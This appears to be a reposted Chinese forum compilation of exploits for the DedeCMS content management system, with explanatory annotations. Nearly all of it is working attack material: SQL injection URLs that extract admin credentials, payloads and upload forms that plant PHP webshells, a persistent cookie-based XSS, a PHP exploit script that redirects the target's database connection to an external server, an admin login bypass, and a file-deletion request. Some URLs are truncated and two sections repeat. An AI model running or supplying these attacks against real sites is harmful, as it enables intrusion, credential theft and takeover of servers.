|
Dedecms 5.6 plus/rss.php 注入漏洞（报错注入：下面的 URL 通过 updatexml() 把 dede_admin 表中的 uname 和 MID(pwd,4,16) 拼进 MySQL 错误信息回显；pwd 为什么从第 4 位取 16 个字符，见下文 advancedsearch 一节对 DedeCMS 密码存储格式的说明）
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
发表后查看或修改即可执行。
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码xiao,直接生成一句话。（两段 base64 分别解码为 x.php 和 <?php eval($_POST[xiao])?>baidu，即以 xiao 为参数名的一句话木马；本节与下文同名一节内容重复。）
Dede 5.6 GBK 版 member/index.php uid 参数 SQL 注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
（以上三条只是探测用的 payload：%E6%B6%9B... 是几个汉字的 UTF-8 编码，WFXSSProbe 是扫描器常用的探测字符串；本帖没有给出实际读取数据的语句，是否可利用需自行验证。）
DedeCms V5.6 plus/advancedsearch.php 任意 SQL 语句执行漏洞（sql 参数里的语句被直接执行；`#@__` 是 DedeCMS 的表前缀占位符，会被替换成站点实际前缀，本帖其他示例中为 dede_）
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问,触发XSS并安装"XSS ROOTKIT"（URL 里 String.fromCharCode(...) 解码后的脚本，会把同样的 "><script>...</script><x=" payload 写进一个名为 gotopage、有效期 365 天的 Cookie）。注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.关闭浏览器后,无论怎么访问下面的任意URL,都会再次触发XSS。（持久化的原因是第 1 步写入的 gotopage Cookie：从现象看 login.php 读取 gotopage 时同样接受 Cookie 来源的值并原样输出，所以不带参数访问也会触发；清除该 Cookie 即可消除。）
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS(织梦)变量覆盖 getshell（下面的 PHP 脚本向 /plus/mytag_js.php 提交 _COOKIE[GLOBALS][cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname/cfg_dbprefix]，把目标站点的数据库连接指向脚本里硬编码的外部 MySQL；该库需事先准备好 dede_mytag 记录，前提与下文"标签远程文件写入漏洞"一节相同）
#!usr/bin/php -w
<?php
// DedeCMS "variable coverage" (GLOBALS overwrite) getshell driver.
//
// Usage: php <script> <host> <aid> <path>
//   host : target host name; Getshell() connects to it on port 80
//   aid  : 1, 2 or 3 -- appended to the request path as ?aid= and used
//          below only to pick which shell location is printed
//   path : DedeCMS install directory on the target, prefixed to /plus/mytag_js.php
// The request itself is built and sent by Getshell(), defined further down
// (PHP hoists unconditional function declarations, so the call below works).
// NOTE(review): the shebang is missing its leading slash (#!/usr/bin/php).
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
// Print usage and stop when the aid argument is absent.
// NOTE(review): == null is a loose comparison, so "0" or "" as aid also lands here.
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
// Getshell() returns only the first line it reads from the socket (see its body).
$exp=Getshell($url,$aid,$path);
// "OK" is what the {dede:php} payload stored in the attacker's dede_mytag row
// echoes after writing the file (see the 标签远程文件写入漏洞 section of this post).
// NOTE(review): since $exp is the first response line -- presumably the HTTP
// status line -- "HTTP/1.1 200 OK" already has "OK" at offset 13, so any 200
// response satisfies this check; "Exploit Success" does not prove a file was written.
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
// The file name printed here is an assumption about what the attacker's
// dede_mytag row writes (the example row in this post writes 1.php);
// nothing in the request controls it. aid only selects the directory shown.
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
/**
 * Build and send the variable-overwrite request to /plus/mytag_js.php.
 *
 * The POST body carries _COOKIE[GLOBALS][cfg_dbhost|cfg_dbuser|cfg_dbpwd|
 * cfg_dbname|cfg_dbprefix], i.e. it overrides the target's database
 * connection settings with a fixed external MySQL server (hard-coded in
 * $content, not derived from $host). The target then reads mytag row
 * aid=$aid from that server and renders it, which is where the {dede:php}
 * body of that row runs -- see the 标签远程文件写入漏洞 section of this post
 * for the row and for the equivalent HTML form.
 *
 * @param string $url  target host name; used for the TCP connect and the Host header
 * @param string $aid  mytag id appended to the request path as ?aid=
 * @param string $path DedeCMS install directory, prefixed to /plus/mytag_js.php
 * @return string|null first line read from the socket, or null if the socket
 *                     is at EOF immediately (the while loop then never runs)
 */
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80"; // plain HTTP only
// url-encoded form body. doaction mirrors the HTML form further down in this
// post; QuickSearchBtn is the GBK encoding of 提交, the form's submit button.
// NOTE(review): doaction hard-codes aid=1 while the request path uses $id.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
// Raw HTTP/1.1 request; the headers imitate a Firefox 5 browser.
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
// NOTE(review): a failed connect is only reported; execution continues and
// fwrite()/feof() below are then called on false.
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
// NOTE(review): the loop returns on its first iteration, so only the first
// response line is ever returned, and the socket is never closed.
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate=dcug改为当前的验证码,即可直接进入网站后台。（原理同样是变量覆盖：_POST[GLOBALS][cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname] 把 login.php 连接的数据库换成了 URL 里那台外部 MySQL，userid=admin&pwd=inimda 应为该库中的账号，而不是目标站点的管理员口令。）
此漏洞的前提是必须知道后台目录路径（如本帖 XSS 示例中的 /dede/），否则无法访问到 login.php。
Dedecms织梦 标签远程文件写入漏洞
前提条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
（注意：本页所示 @fwrite 的第二个参数是空字符串，原样执行只会得到一个空的 1.php 并回显 OK；转帖时单引号被双写成 ''，上面已还原。）
再用下面表单提交,1.php 就写在 mytag_js.php 的同目录下。原理：plus/mytag_js.php 把表单里的 _COOKIE[GLOBALS][cfg_db*] 当作数据库配置使用（变量覆盖），于是目标站点连到表单里填的那台 MySQL，读出 dede_mytag 中 aid=1 的 normbody 交给模板引擎解析，其中的 {dede:php} 标签会在目标服务器上执行 PHP。
. V0 ]6 T% U$ i) r<form action="" method="post" name="QuickSearch" id="QuickSearch">
3 f. e8 p/ A, F8 k& _/ N<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
, ~$ X0 M6 k* j. t" x<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />' w0 ~4 o3 u' R7 X2 y. [
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ ]* S9 h7 U! v0 Y8 X5 } g<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
& \. k9 R. @2 U' |- ~1 }. |, C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ t. G3 j* K2 G: O5 N- M( Y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% D9 L4 j9 Y& ^$ R% G' ]. Q/ ~4 r
<input type="text" value="true" name="nocache" style="width:400">3 L/ Y2 h/ O: ~
<input type="submit" value="提交" name="QuickSearchBtn"><br />
) |$ G8 X5 s: n, |- C7 A</form>
) v7 r9 v6 e2 G- D" e' U<script>
* Q b1 H* I5 v7 ?2 jfunction addaction()
% t& e" _6 I9 D1 J{
. \1 W; s* Z7 M- Ddocument.QuickSearch.action=document.QuickSearch.doaction.value; m" R7 \+ H/ y
}
3 j& j& ?* [/ x) P9 e% n</script>
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao,直接生成一句话（base64 解码后即 <?php eval($_POST[xiao])?>baidu）。本节与前文同名一节内容重复。
Dedecms <= V5.6 Final 模板执行漏洞
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,在文件开头加 gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
（runphp='yes' 的标签体会作为 PHP 执行；上面写出的 1.php 是以 cmd 为参数名的一句话木马。）
2 修改刚刚发表的文章,查看源文件,构造一个表单（关键是末尾的 templet 与 dede_addonfields 两个字段）:
- M* {- q* \. A) C7 Q- g<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"> x. ~5 l: \ p! v2 L
<input type="hidden" name="dopost" value="save" />( t/ h5 k) f7 o0 u% c/ c5 p E
<input type="hidden" name="aid" value="2" />
: Z' T: _4 I1 S9 a+ R5 K X" p<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />6 |2 p1 y0 p R: p, s
<input type="hidden" name="channelid" value="1" />/ N! T4 V% U2 d; k: o+ x9 ~( p
<input type="hidden" name="oldlitpic" value="" />* ~, j7 q+ J4 }+ r
<input type="hidden" name="sortrank" value="1275972263" />
" y. }( C7 z6 I" i! c! _8 {/ `3 e4 B; E8 q& j( A C
( T7 ?: W6 w2 Y5 j<div id="mainCp"># k8 B* h ~ t% T0 a
<h3 class="meTitle"><strong>修改文章</strong></h3> ]' Y. B6 m7 `
4 `' a6 A w7 Z, @, ^<div class="postForm">$ p+ T4 O7 M+ ?, q9 F% C
<label>标题:</label>! n% h4 T8 D1 O1 q8 W% O P7 I! i; }3 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
6 n7 `/ c3 |# Z, g<label>标签TAG:</label>' n9 N# q' P. T$ j, J% N# _8 `* R$ B
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>0 X8 l+ d* q) {- o& k! n; S9 w+ k
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
# ~ o% C1 `+ L, @% W- {' y; @<label>隶属栏目:</label>( m- s' P6 ~2 x2 j& v8 R
<select name='typeid' size='1'>
& g; O4 k W0 T1 `<option value='1' class='option3' selected=''>测试栏目</option>
6 T0 N0 d* N! x! V</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): |' q( R A& _5 {8 w7 N
<label>我的分类:</label>4 N4 v4 \4 s! `
<select name='mtypesid' size='1'>% ?1 n8 ]7 J( j7 v& i% U$ d
<option value='0' selected>请选择分类...</option>
# h: {7 z2 o9 u9 h<option value='1' class='option3' selected>hahahha</option>- y% n) E: m' g2 e0 J+ f ]( A
</select>! Q }5 w* W+ C* X6 Z- t, p, m. _
% }0 b+ F: O5 a7 `3 S4 Q. I$ a<label>信息摘要:</label>) ?4 K5 c& f# O
<textarea name="description" id="description">1111111</textarea>
1 |* u8 w% W* U N# }(内容的简要说明)
$ X! ] a' F6 J. Z/ _<label>缩略图:</label>/ T: G$ X! Q) r c z
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
, r8 l' D m+ [* J/ E' g6 H$ W<input type='text' name='templet'4 F6 L: c+ ]0 C6 A0 y
value="../ uploads/userup/2/12OMX04-15A.jpg">( W5 x/ Q9 h, X, S% }
<input type='text' name='dede_addonfields'" K1 F+ n: {' S& x% `+ J
value="templet,htmltext;">(这里构造)! @& {( x4 _, c: @& ^. v+ I+ r
</div># h% z& }+ B8 S3 x4 ]2 |7 U; M
<!-- 表单操作区域 -->7 \% I8 l* q5 l) w& x% n0 ]
<h3 class="meTitle">详细内容</h3>
7 ~/ V$ j$ G1 c! B. d% i<div class="contentShow postForm">
, k/ ^7 @: W9 D<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>' L: g* ?. M3 q- n% h3 t
<label>验证码:</label> M+ [& Q( l k2 r& }2 G: {" w
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
* ] A+ M6 I4 h! I5 p<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
3 J; m! E1 z& C3 q$ n<button class="button2" type="submit">提交</button>6 U4 J& F y. G; O5 e. Z
<button class="button2 ml10" type="reset">重置</button>
/ G- c% g; ~6 A+ [0 X2 o; a</div>
</div>" B- R- Z4 e) G& f' u
</form>% v! ~1 o; C( ]+ [* u! P H0 i3 S
提交,提示修改成功,则我们已经成功修改模板路径（起作用的是表单里的 templet=../uploads/userup/2/12OMX04-15A.jpg 和 dede_addonfields=templet,htmltext;，它们把文章模板指向了用户上传目录里的文件；上面表单中 "../ uploads" 多出的空格疑为转帖产生，对照下一节的 ../uploads/userup/3/1.gif 应无空格）。
3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php
DEDECMS网站管理系统 Get Shell 漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif（开头的 Gif89a 用于通过图片类型检查；runphp='yes' 使标签体作为 PHP 执行）
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' C7 v7 S: e" n9 o
<input type="hidden" name="aid" value="7" /> * K: y8 P) c9 a6 n: H
<input type="hidden" name="mediatype" value="1" />
8 L M' K7 R) M<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
+ Q- W$ Q* B; d<input type="hidden" name="dopost" value="save" /> % N9 M) K/ D @* S6 @
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ' j- v% j) t6 `* v, {" w/ W# u
<input name="addonfile" type="file" id="addonfile"/>
7 J% M& T" [& t<button class="button2" type="submit" >更改</button>
5 | ~5 `& d) {. t+ B" g</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下（与上一节相同，靠 dede_addonfields=templet 和 templet=../uploads/userup/3/1.gif 把文章模板指向上传的文件）:
8 K5 } L V0 D1 p<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 8 I" Q: O( B9 P* H6 h
<input type="hidden" name="dopost" value="save" />
5 }7 a" O# @8 g. I1 p @! g8 H<input type="hidden" name="aid" value="2" />
0 f* t4 e" j& s3 A* X% `- Z/ A<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5 A; I8 o" ^# ~
<input type="hidden" name="channelid" value="1" />
" @4 I/ Q* T/ \9 S2 q) C# E+ y) B<input type="hidden" name="oldlitpic" value="" /> 7 n+ f/ @% o" z
<input type="hidden" name="sortrank" value="1282049150" /> 5 D% j+ e2 h" @# h* R
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
+ _" `: B! c# g0 Z' c }<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> - j' G0 R5 H0 {) @8 Z, u
<select name='typeid' size='1'> ' X: @0 ^$ z1 c2 z- d
<option value='1' class='option3' selected=''>Test</option> 8 j7 m7 E5 M1 y w& N
<select name='mtypesid' size='1'>
) |9 m+ p. O2 W. I0 H6 M* m( l<option value='0' selected>请选择分类...</option>
2 {1 x$ e2 W% U# e<option value='1' class='option3' selected>aa</option></select>
/ {5 Z7 P5 C/ P# r# Q<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> / T: b6 Y) B+ f# K5 H
<input type='hidden' name='dede_addonfields' value="templet">
+ Z7 a# \2 _& N5 s/ B$ [. C<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ( V) p; Z+ O# X! F9 H' ]
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
# O$ A+ _/ C8 ^6 {+ q<button class="button2" type="submit">提交</button>
9 I; R7 T' x, F1 {3 f</form>
织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
（从参数名看，delold 分支会删除 oldface 指向的旧头像文件，而 oldface 中的 ../ 未被过滤，因此可越出 uploads/userup/ 删除其他文件；示例删除的是 member/templets/images/m_logo.gif。）
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
（注意：这条 URL 在转帖时被截断，"carbuya ... urn" 中间的参数已丢失，只能看出 code 参数带 ../../ 目录穿越；完整参数本页无法恢复，需对照 carbuyaction.php 源码核实。）
DedeCms V5.6 plus/advancedsearch.php 任意 SQL 语句执行漏洞（与前文同名一节重复）
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
取回的 pwd 字段是 DedeCMS 截断后的 20 位哈希（32 位 MD5 去掉前 5 位和后 7 位）；再去掉前 3 位和后 1 位就得到标准的 16 位 MD5，这也是前文 rss 注入里写 MID(pwd,4,16) 的原因。
" i1 \! V$ l" [3 w织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
' Q% n; B8 p# V! s Bhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
( m" a$ r- X1 @( A织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
' o" g, P& L0 W) v& m2 i% G# n5 O<html>
" b. L/ C0 T$ k4 _<head>. n* G8 X6 v- K+ Y, X, O
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>' ~ W) l- _8 o
</head>, O7 Y& G ~4 |- e1 z1 D2 I
<body style="FONT-SIZE: 9pt">& p" Z. b& x3 y+ I
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
) ~8 | N- ]; l<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
5 T2 u$ H4 y( M1 a9 p4 W" \<input type='hidden' name='activepath' value='/data/cache/' />) m0 M! ?8 A" X W N
<input type='hidden' name='cfg_basedir' value='../../' />
0 p0 w' |& }; U0 b' g7 J4 G<input type='hidden' name='cfg_imgtype' value='php' />2 v) [8 H4 Q6 ]6 {" b/ e7 }
<input type='hidden' name='cfg_not_allowall' value='txt' />4 K; \6 V, C6 P- I
<input type='hidden' name='cfg_softtype' value='php' />; ]7 a0 _1 c' f3 o
<input type='hidden' name='cfg_mediatype' value='php' />
0 [6 h' L- n$ v<input type='hidden' name='f' value='form1.enclosure' />
/ i* Y9 l# R2 ^4 F. D<input type='hidden' name='job' value='upload' />9 \$ ]" G3 e! g/ P6 S! X$ X/ q' ]: F
<input type='hidden' name='newname' value='fly.php' />8 |! Q" |8 ~8 l! ?8 S: X2 O
Select U Shell <input type='file' name='uploadfile' size='25' />
( p8 b: X3 H! J* g<input type='submit' name='sb1' value='确定' />
+ O u$ U0 F, _; M</form># }2 y4 z. P5 Y" d7 ?6 ~" `% K
<br />It's just a exp for the bug of Dedecms V55...<br />& o# f8 l7 T9 n) t* B. J- h
Need register_globals = on...<br />
% L4 @2 j" ^' p' c+ O0 t, ]+ ~Fun the game,get a webshell at /data/cache/fly.php...<br />
; R1 F) Y1 d$ x</body>( T! H- }8 x& g8 W
</html>" A( w0 R7 x, q) O& M
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
原理：id=1024e1024 这个超出 double 范围的值会让 MySQL 报错（见下文 "Illegal double '1024e1024'"），DedeCMS 把出错的 SQL 原文记录到 data/mysql_error_trace.php；该文件是 PHP 文件，日志内容只靠注释包裹、文件头部没有任何校验，mid 参数里的 */ 关闭了注释，后面的 eval($_POST[x]) 就成了可执行代码，访问该日志文件即可触发。
1. 访问网址:( J" \, o" w1 Y6 s6 k+ ^
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
（这条 URL 在转帖时被截断；从下文日志可知 id 参数值为 1024e1024，%65 即字母 e。）
可看见错误信息
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息（int(3) 是 var_dump(3) 的输出，说明注入的代码已被执行）证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
. U+ a v- k' b/ _8 [! L; iError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
7 |& P5 S* I L8 y- }" V u& H5 j* Q f6 @& |& y
3. 执行dede.rar里的文件 test.html（附件不在本页，下面只保留了该表单的 action 行；表单向已被写入代码的 mysql_error_trace.php POST 参数 x）,注意 form 中 action 的地址是
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
按确定后如果看到第 2 步那样的信息,表示 POST 过去的代码已在服务器上执行成功。
织梦(DedeCms) plus/infosearch.php 文件注入漏洞（q 参数以 %cf' 开头，是典型的 GBK 宽字节注入写法——高位字节与转义用的反斜杠拼成一个汉字，使后面的单引号生效；本帖未说明原理，以此为推测。后面的 union 从 dede_admin 取 userid、pwd）
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
|